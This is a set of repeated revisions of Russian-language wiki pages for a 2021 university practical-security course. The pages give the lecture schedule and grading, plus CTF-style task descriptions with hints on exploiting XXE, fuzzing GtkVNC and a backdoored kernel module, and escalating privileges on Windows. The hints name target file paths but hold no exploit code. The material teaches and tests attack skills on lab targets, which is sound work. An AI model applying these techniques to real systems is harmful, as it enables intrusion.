* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:15:22Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-22T13:59:17Z

Asterite:

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)/Задание LPE в Windows

2021-05-22T13:57:36Z

Asterite:

В задании три флага (300, 700 и 1000 баллов), в общей сложности можно получить 2000 баллов.
Суть задачи в том, что вам необходимо повысить свои привилегии на win-системе и получить содержимое файлов-флагов. Для вашего удобства базовый OVA-образ доступен для скачивания. Образ, который используется в таске, отличается от базового только паролем админа и текстом в файлах с флагами.

Вам нужно будет написать программу (исполняемый файл exe), которая получает флаг и печатает его в stdout. При помощи сабмит-системы вы можете отправлять свои программы на запуск и получать результат их выполнения (примерно минут через 10 после запуска), включая stdout. Ваши программы запускаются от пользователя user. Все флаги начинаются с префикса <code>main_FLG</code>.

Адрес задания: http://l.poc.fun:1337/

Для выполнения задания вам потребуется VirtualBox и что-то для сборки программ под windows (я рекомендую VS2019 community edition).

Рекомендуемый порядок выполнения задания:
# Качаете OVA, разворачиваете у себя, загружаетесь, изучаете систему;
# Придумываете, как получить флаг / флаги;
# Пишете программу, которая получает флаг;
# Тестируете её у себя локально;
# Сабмитите в проверялку и получаете реальный флаг.

Если что-то не работает, пишите в телеграмме в личку @webpentest.

PS. Задачки на 300 и 700 баллов совсем простые и вообще не выходят за рамки того, что обсуждалось на семинаре.

Дедлайн по этой задаче: '''24 мая 23:59'''

Дополнительные главы практической безопасности (2021)/Задания

2021-05-22T13:57:25Z

Asterite:

* [[Дополнительные_главы_практической_безопасности_(2021)/Задания по XXE|Задания по XXE]]
* Хотя рождество ещё не скоро, у нас тут уже заранее работает [http://christmas.tasks.course.secsem.ru/ сайт, позволяющий проверить, ждёт ли вас подарок на рождество]. Может это будет флаг?? Исходный код php-файла на этом сайте можно посмотреть, заменив расширение на <code>.phps</code>. Этот таск стоит '''100''' баллов. Дедлаин по нему: '''18 мая, 23:59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Домашнее_задание_по_фаззингу|Задания по фаззингу бинарных программ]]
* [[Дополнительные_главы_практической_безопасности_(2021)/Задания_по_темам_первых_четырёх_семинаров|Задания по темам первых четырёх семинаров]]
* [http://206.189.1.230:1337/ Задание по атакам на race condition в веб-приложениях]. Его стоимость: '''1000''' баллов. Дедлаин по этой задаче: '''24 мая, 23:59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Задание_LPE_в_Windows|Задание по эскалации привилегий (LPE) в Windows]]

==== Формат заданий ====

В каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему. Для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаги могут иметь разную стоимость. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

==== Сдача флагов ====

Флаги нужно сдавать в [http://dashboard.course.secsem.ru/ принимающую систему]. Флаги могут время от времени меняться, если вы получили флаг, но он не сдаётся, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

==== Поломка заданий ====

Поломка не исключена, если задание не работает, или вы думаете что что-то работает не так, как должно, пишите в чат или мне в телеграм @asterite3.

Дополнительные главы практической безопасности (2021)/Домашнее задание по фаззингу

2021-05-16T23:11:49Z

Asterite: /* Задача */

= Домашнее задание по фаззингу =

== Первый семинар ==

=== Задача ===

http://fuzzing.tasks.course.secsem.ru/

На первом семинаре мы с вами говорили о том, что CTF задачи на бинарную эксплуатацию довольно часто развивают не те навыки, которые востребованы в реальной жизни. Данная задача направлена на развитие ваших навыков автоматизации поиска уязвимостей, диагностики ошибок и написания репортов по найдённым уязвимостям. Для выполнения задачи вам будет предложено искать реальные уязвимости в реальном продукте при помощи фаззинга.

Исследуемый продукт: GtkVNC — клиент для приложений доступа к удалённого экрану, которые используют протокол RFB. [https://tools.ietf.org/html/rfc6143 RFC на протокол]

Для того, чтобы начать искать уязвимости [https://gist.github.com/PaulCher/d4ed9df3e04e0777198538cd36c79a4c достаточно сделать это...]

Правила игры:
Чем больше уязвимостей Вы найдёте в проекте — тем лучше.
Сколько уязвимостей — неизвестно, но они есть.
Если Вы — первый человек, кто нашёл уязвимость данного типа, то мы вместе непублично репортим уязвимость вендору и регистрируем на Вас идентификатор CVE.
Уязвимости, которые приводят к возможности получения удалённого доступа на клиенте оцениваются выше, чем уязвимости, которые приводят к падению клиента (RCE круче, чем DoS).
Уязвимости искать руками тоже можно не используя фаззинг, это не будет контролироваться.

Для того, чтобы подтвердить, что вы действительно нашли уязвимость вам необходимо будет написать минимальный Proof-of-Concept, который необходимо будет сдать в проверяющую систему. Проверяющая система будет запускать ваш PoC и тестировать, что бинарный пакет gtkvnc, скомпилированный с AddressSanitizer выдаёт типичную для ASAN-a ошибку. Если уязвимость, которую вы нашли не триггерит ASAN, но является уязвимостью (например это ошибка неинициализированной памяти, которую клиент удалённо может считать), то пишите в телеграмм paulchr . Такие уязвимость тоже буду засчитаны.

Прежде, чем посылать эксплоит на сервер рекомендуется убедиться, что вы можете получить ошибку локально, подключившись при помощи клиента GtkVNC, который скомпилирован с библиотекой ASAN. После того как вы убедились в этом, посылайте ваш PoC на сервер. Для этого надо зарегистрироваться на нём, выбрать "Targets" -> "GtkVNC" и загрузить скрипт на сервер. Запускаться он будет через ./poc, так что не забудьте шабанг.

Если PoC успешно пройдёт проверку, то он будет переведён из состояния "in progress" в состояние "success", иначе он перейдёт в состояние "failed". Таймаут работы — одна минута, но если вашему скрипту нужно больше времени на работу, чтобы стриггерить уязвимость, так как он, например, посылает много данных, то это поправимо (пишите в телеграмм). Если после загрузки файла на сервер ваш PoC завис в состоянии "in progreess", "created" или "internal error", то пишите в телеграмм, скорее всего что-то сломалось и я постараюсь это почитать как только так сразу. Система тестируется на людях в первый раз.

Если ваш PoC перешёл в состояние success, то поздравляю, вы стриггерили уязвимость, но это не конец. Для успешного завершения упражнения Вам необходимо написать репорт в проверяющую систему где вы опишете подробно насколько это возможно уязвимость и последствия для программы, к которым она приводит. Описание отправляется на ревью (состояние "on review") и может быть отклонено администраторами системы, если репорт был плохо написан. Примеры таких возможных случаев: причина уязвимости была неверно истолкована или непонятно изложена, импакт данной уязвимости был определён неверно, ваш PoC написан не достаточно понятно или обфусцирован или был загружен бинарный исполняемый файл. В таком случае Ваш submission отправляется в состояние "rejected". Если Вы первым смогли стриггерить данную уязвимость, но плохо написали репорт, и человек после Вас получил успешный статус "success", то он будет считаться первым успешно выполнившим задание, а следовательно, будет претендовать на получение идентификатора CVE, даже если Вы потом успешно заново сдали данную уязвимость.

В окружении в котором будет запускаться ваш PoC есть питон3 и библиотека pwntools. [https://gist.github.com/PaulCher/d86d4db6bba67034e1c4de69e9edafd7 Подробнее об устройстве PoC контейнере]

Делиться информацией о найденных уязвимостях ни с кем категорически нельзя до конца задания!

'''Дедлаин по этой задаче: 18 мая 23:59:59'''

=== Вспомогательные материалы ===

* [https://github.com/google/AFL/ AFL]
* [https://github.com/google/AFL/blob/master/docs/technical_details.txt AFL technical_details.txt]
* [https://llvm.org/docs/LibFuzzer.html Базовая справка по libFuzzer]
* [https://github.com/Dor1s/libfuzzer-workshop Хороший воркшоп про libFuzzer]
* [https://github.com/google/sanitizers/wiki/AddressSanitizer Документация AddressSanitizer]
* [https://github.com/llvm-mirror/compiler-rt/blob/master/test/fuzzer/AbsNegAndConstant64Test.cpp Пример интересного теста из libFuzzer (да, он и такое умеет)]
* [https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/ Пример фаззинга реального приложения от и до]
* [https://github.com/google/fuzzing/blob/master/tutorial/libFuzzerTutorial.md libFuzzer tutorial]

=== FAQ по домашке ===

* Что делать если "Internal Error"?

Писать в чат в телегремме. На сервере иногда случаются докер-проблемы, но всё что отработало с "Internal Error" будет перепроверено и засчитано.

* Почему мы откатываемся на какой-то коммит? Неужели ты нас обманул и мы ищем уже запатченные уязвимости?

Нет, на коммит я откатился, потому что на нём я тестировал свой фаззер и вместе с ним сбилжен тестовый билд с ASAN-ом на котором проверяются ваши эксплоиты. Соответственно вам тоже удобнее будет тестировать не на последнем коммите, потому что если в проекте с тех пор появились какие-то обновления, то они могут помешать и вы не поймёте что случилось.

* У тебя там тестируется всё локально, поэтому я могу наверное как-то обмануть проверяющую систему и мне засчитается submission?

Скорее всего это не получится. Контейнеры, в которых запускаются ваш PoC и уязвимый бинарь, изолированы друг от друга и от общей докеровской сети. Кстати, в связи с этим будьте внимательны: ваш PoC должен слушать порт 5900 не на 127.0.0.1, а на 0.0.0.0

* Экслоит не работает. Что делать?

Сбилдить указанный коммит с ASAN-ом и проверить руками свой пок.

* Эксплоит работает локально, но не работает удалённо. Что делать?

Проверьте различные проблемы. Проверьте, что первой строчкой в вашем поке идёт шебанг. Вы используете питон версии 3. Ваш пок не использует лишних библиотек. Если вы сидите на винде, то замените все переводы строк с CRLF на LF. Если всё это не работает, то пишите в чат в телеграмме.

* Что должен содержать минимальный репорт?

Подробное описание где конкретно проижошла уязвимость с именами файлов, функций и номерами строк. Что привело к уязвимости: понятное и точное описание с именами переменных. Импакт от данной уязвимости. Может ли данная уязвимость привести к возможности удалённого исполнения кода. Если для этого будут требоваться другие уязвимости, то написать какие именно (например, memory leak). Если при описании импакта Вы не уверены на 100%, то можно написать об этом. Идентификатор [https://cwe.mitre.org/ CWE].

* Где создать репорт?

После того, как ваш PoC отработал со статусом "success" кнопка "Create Report" будет находиться на полной странице вашего submission_a. Там же впоследствии появится комментарий проверяющего после ревью.

== Второй семинар ==

== Третий семинар ==

На третьем семинаре мы говорили о фаззинге бинарных программ на уровне ядра.

=== Задача ===

Дан [https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing_3_hw.zip небольшой ядерный модуль] для Linux 5.4.0-72 (такое ядро есть, например, на полностью обновлённой Ubuntu 20.04). Его можно загрузить с помощью команды <code>insmod</code>. Модуль реализует простейшее устройство, принимающее файл конфигурации и возвращающее значение параметра из него. Для взаимодействия с ним можно создать устройство в файловой системе: после insmod посмотрите в выводе dmesg, какой "major device number" получило устройство test. У меня этот номер равен 241, дальше буду использовать его. Для создания файла устройства выполните команду <code>mknod /dev/test c 241 0</code>. После этого с модулем можно общаться через файл <code>/dev/test</code>. Для примера, сделайте <code>echo '{"param1": "123456"}' > /dev/test && head -c 6 /dev/test</code>.

В модуле есть "закладка", вам предлагается найти её с помощью фаззинга. Скачайте kAFL (официальный репозиторий располагается [https://github.com/IntelLabs/kAFL тут], но я советую использовать мою ветку ip_decoder_fix [https://github.com/vient/kAFL отсюда]): <code>git clone https://github.com/vient/kAFL && cd kAFL && git checkout ip_decoder_fix</code>. После этого воспользуйтесь [https://github.com/vient/kAFL/blob/ip_decoder_fix/doc/TUTORIAL.Installation.md мануалами] и [https://github.com/vient/kAFL/blob/ip_decoder_fix/doc/TUTORIAL.Linux_fuzzing.md документацией] для подготовки окружения и фаззинга. Обратите внимание, что kAFL не будет работать в виртуальной машине!

Для сдачи задания вам нужно прислать тест-триггер уязвимости и описание, как высокоуровнево устроен бекдор, на [mailto:vient@seclab.cs.msu.ru мою почту]. С вопросами по поводу дз можно писать мне в телеграм @vient.

'''Дедлаин по этой задаче: 31 мая 23:59:59'''

Дополнительные главы практической безопасности (2021)/Задания по XXE

2021-05-16T10:38:25Z

Asterite:

Первый флаг можно найти в приложении http://xxe-indirect.tasks.course.secsem.ru/, он в файле <code>/opt/src/flag</code>. В этом приложении нет флагов кроме этого обязательного. Также, флаги стоит поискать в приложении http://xxe-oob.tasks.course.secsem.ru/ (в нём стоит попробовать получить содержимое <code>/etc/privateinfo.txt</code>) и в [http://xxe-shop.tasks.course.secsem.ru/ этом интернет-магазине]. В последнем 2 обязательных флага, подсказки где они стоит искать на главной странице, для их получения стоит попробовать использовать error-based эксплуатацию XXE. Кроме того, для эксплуатации в последних двух сервисах может помочь такая особенность XML-парсера Java как выдача листинга директории при чтении её как файла.

Наконец, глянуть нет ли случайно флага можно в файле <code>/srv/knowledge/information.txt</code> на сервере, на котором крутится [http://fire.tasks.course.secsem.ru/ этот сайт].

Всего в заданиях на этой странице '''5''' обязательных флагов, суммарной стоимостью '''800''' баллов.

Дедлаин по этим таскам: '''18 мая, 23:59'''

Дополнительные главы практической безопасности (2021)/Задания по темам первых четырёх семинаров

2021-05-16T10:38:16Z

Asterite:

По одному обязательному флагу можно найти в
* [http://finder.tasks.course.secsem.ru/ этом приложении для поиска] (кстати, его веб-рут находится в директории <code>/app</code>. Также, может помочь натравить приложение на свой сервак и посмотреть что там в заголовках пришедшего запроса)
* [http://www.valldenuria.not.a.cat.tasks.course.secsem.ru/ этом сайте курорта] ([http://94.130.175.205/utils.jspinc вот один из файлов из его исходников]). Там чтобы найти флаг надо будет запустить программу, находящуюся на файловой системе по пути <code>/app/readfilewithflag</code>. Для решения может помочь узнать какой есть на сервере софт, для этого можно попробовать пошарить по разным директориям
* [http://fmt.tasks.course.secsem.ru/app/ этом приложении], где с чтением флага похожая история
* и [http://wd.tasks.course.secsem.ru/ этом сайте] ([http://94.130.175.205/sessions.py а вот один из файлов из его исходников])
* [http://conflux.tasks.course.secsem.ru/ а также тут] ([http://94.130.175.205/conflux-src.tgz тут вообще все исходники даны]).

Обязательные флаги за эти задания дают в сумме '''3200''' баллов. Дедлаин по этим таскам: '''18 мая, 23:59'''

Дополнительные главы практической безопасности (2021)/Задания

2021-05-16T10:38:01Z

Asterite:

* [[Дополнительные_главы_практической_безопасности_(2021)/Задания по XXE|Задания по XXE]]
* Хотя рождество ещё не скоро, у нас тут уже заранее работает [http://christmas.tasks.course.secsem.ru/ сайт, позволяющий проверить, ждёт ли вас подарок на рождество]. Может это будет флаг?? Исходный код php-файла на этом сайте можно посмотреть, заменив расширение на <code>.phps</code>. Этот таск стоит '''100''' баллов. Дедлаин по нему: '''18 мая, 23:59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Домашнее_задание_по_фаззингу|Задания по фаззингу бинарных программ]]
* [[Дополнительные_главы_практической_безопасности_(2021)/Задания_по_темам_первых_четырёх_семинаров|Задания по темам первых четырёх семинаров]]
* [http://206.189.1.230:1337/ Задание по атакам на race condition в веб-приложениях]. Его стоимость: '''1000''' баллов. Дедлаин по этой задаче: '''21 мая, 23:59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Задание_LPE_в_Windows|Задание по эскалации привилегий (LPE) в Windows]]

==== Формат заданий ====

В каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему. Для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаги могут иметь разную стоимость. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

==== Сдача флагов ====

Флаги нужно сдавать в [http://dashboard.course.secsem.ru/ принимающую систему]. Флаги могут время от времени меняться, если вы получили флаг, но он не сдаётся, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

==== Поломка заданий ====

Поломка не исключена, если задание не работает, или вы думаете что что-то работает не так, как должно, пишите в чат или мне в телеграм @asterite3.

Дополнительные главы практической безопасности (2021)

2021-05-13T11:44:52Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Гарантируется, что 10000 и больше будут давать оценку "отлично".

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)/Задание LPE в Windows

2021-05-11T16:37:20Z

Asterite:

